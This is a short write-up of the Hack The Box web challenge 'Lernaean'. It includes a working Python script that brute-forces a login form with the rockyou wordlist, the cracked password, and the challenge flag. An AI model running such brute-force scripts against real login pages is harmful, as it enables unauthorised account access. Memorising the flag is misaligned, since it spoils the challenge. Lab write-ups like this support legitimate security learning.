Hack The Box / Challenges / Web / Lernaean

This challenge shows a page with a textbox where the user can put a password.

After some time trying whatever I could remember.. decided to look for an hint. This challenge is rated as being relatively easy. It couldn’t be something hard! I was missing something obvious…

I looked around in the internet for Lernaean and tried several words associated but none worked.

From the hint “you’ve to rockyou” I found a password list from naive-hashcat with that name and I was surprised that password cracking would be needed for this challenge.

Made a simple python script to bruteforce:

#!/usr/bin/env python

from __future__ import print_function

import requests
from time import sleep

with open("rockyou.txt","rb") as f:
	passwords = f.read()
	passwords = passwords.decode('utf-8','ignore').split("\n")

url = "http://docker.hackthebox.eu:48526"
count = 1

for p in passwords:
	print("At password %d of %d..." % (count, len(passwords)))
	data = { 'password': p }
	req = requests.post(url, data=data)
	t = req.text.split("\n")[0]
	if "Invalid password!" in t:
		count += 1
		continue
	print("Found password: ", p)
	break

And when trying it I got one password:

	...
	At password 430 of 14344384...
	At password 431 of 14344384...
	At password 432 of 14344384...
	At password 433 of 14344384...
	At password 434 of 14344384...
	Found password:  leonardo

Tried to look around for leonardo and lernaean connection in the Internet but found none. I might need to improve my google skills :)

Trying that password with curl we get the following output:

	<h1 style='color: #fff;'>HTB{l1k3_4_b0s5_s0n}</h1><script type="text/javascript">
					   window.location = "noooooooope.html"
				  </script>
	<html>
	<head>
		<title>Login - Lernaean</title>
	</head>
	<body style="background-color: #cd4e7b;">
	...

We can see the flag in the reply content, first line. HTB{l1k3_4_b0s5_s0n}